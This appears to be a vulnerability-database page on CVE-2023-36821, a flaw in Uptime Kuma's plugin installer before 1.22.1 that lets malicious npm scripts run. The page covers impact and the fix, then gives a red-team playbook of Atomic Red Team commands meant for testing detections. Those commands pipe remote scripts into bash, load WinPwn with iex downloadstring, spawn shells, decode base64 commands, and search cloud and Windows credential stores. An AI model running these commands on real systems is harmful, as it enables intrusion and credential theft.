CVE-2023-36821
Overview
This vulnerability is a command injection flaw arising from improper validation of plugins installed via an authenticated API in Uptime Kuma prior to version 1.22.1. The affected component is the plugin installation mechanism, which executes npm install commands without restricting or sanitizing plugin sources or scripts. The API endpoints responsible for plugin installation remain accessible despite the web interface disabling plugin installation, enabling exploitation through maliciously crafted plugins containing harmful npm scripts.
Vulnerability Description
Uptime Kuma, a self-hosted monitoring tool, allows an authenticated attacker to install a maliciously crafted plugin in versions prior to 1.22.1, which may lead to remote code execution. Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login. After downloading a plugin, it's installed by calling `npm install` in the installation directory of the plugin. Because the plugin is not validated against the official list of plugins or installed with `npm install --ignore-scripts`, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution. Version 1.22.1 contains a patch for this issue.
Impact
An authenticated attacker with login access can install a malicious plugin that executes arbitrary commands on the host system, leading to full remote code execution. This requires valid user credentials but no additional user interaction or elevated privileges beyond authenticated access. Exploitation can result in data compromise, service disruption, or lateral movement within the network. The CVSS vector indicates low attack complexity and no user interaction, emphasizing the severity of authenticated exploitation.
Solution
Upgrade Uptime Kuma to version 1.22.1 or later, where the plugin installation API has been secured and plugin validation enforced, as documented in the GitHub advisory GHSA-7grx-f945-mj96. The patch disables unauthorized plugin installation and prevents execution of arbitrary npm scripts during plugin setup. Refer to the official GitHub repository pull request #3346 for implementation details and ensure all instances are updated promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Uptime Kuma arises from its plugin installation mechanism, which allows authenticated users to install plugins from an official list. While the web interface feature for plugin installation is disabled, the underlying API endpoints remain accessible post-authentication. This oversight permits an attacker with valid credentials to exploit the system by uploading a maliciously crafted plugin. The critical flaw lies in the absence of validation against the official plugin list and the use of `npm install` without the `--ignore-scripts` flag. This lack of validation allows the execution of arbitrary code through npm scripts embedded in the malicious plugin, leading to potential remote code execution.
In terms of attack vectors, the exploitation of this vulnerability requires an attacker to first gain authenticated access to the Uptime Kuma instance. This could be achieved through various means, such as credential stuffing, phishing, or exploiting other vulnerabilities in the application or its environment. Once authenticated, the attacker can leverage the API to install a malicious plugin, which could execute arbitrary commands on the server. The ability to run arbitrary code poses a significant risk, as it could allow the attacker to manipulate system files, exfiltrate sensitive data, or even pivot to other systems within the network.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on Uptime Kuma for monitoring critical infrastructure. The potential for remote code execution means that attackers could gain full control over the monitoring tool, which may lead to further compromises of the underlying systems it monitors. This could result in service disruptions, data breaches, and significant financial losses. Additionally, the reputational damage from such an incident could deter customers and partners from engaging with affected organizations. The high CVSS score of 8.8 underscores the severity of the risk, indicating that organizations must prioritize addressing this vulnerability.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to upgrade to the latest version of Uptime Kuma, which includes a patch that addresses this issue. Regularly updating software and monitoring for security advisories can help organizations stay ahead of potential threats. Additionally, organizations should enforce strict access controls, ensuring that only trusted users have authenticated access to the Uptime Kuma instance. Implementing logging and monitoring solutions can also help detect unusual activities, such as unauthorized plugin installations. Finally, organizations should consider employing application security best practices, including code reviews and security testing, to identify and remediate vulnerabilities before they can be exploited.
In conclusion, the vulnerability in Uptime Kuma highlights the importance of secure software development practices and the need for vigilant monitoring of application security. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats. Proactive measures, including timely updates, access controls, and robust monitoring, are essential in mitigating the risks associated with this vulnerability and ensuring the integrity of critical monitoring systems.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Uptime-Kuma Project | Uptime-Kuma | All |
cpe:2.3:a:uptime-kuma_project:uptime-kuma:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36821 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/louislam/uptime-kuma/security/advisories/GHSA-7grx-f945-mj96 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/louislam/uptime-kuma/pull/3346 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/louislam/uptime-kuma/blob/8c60e902e1c76ecbbd1b0423b07ce615341cb850/server/plugins-manager.js#L210-L216 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/louislam/uptime-kuma/releases/tag/1.22.1 |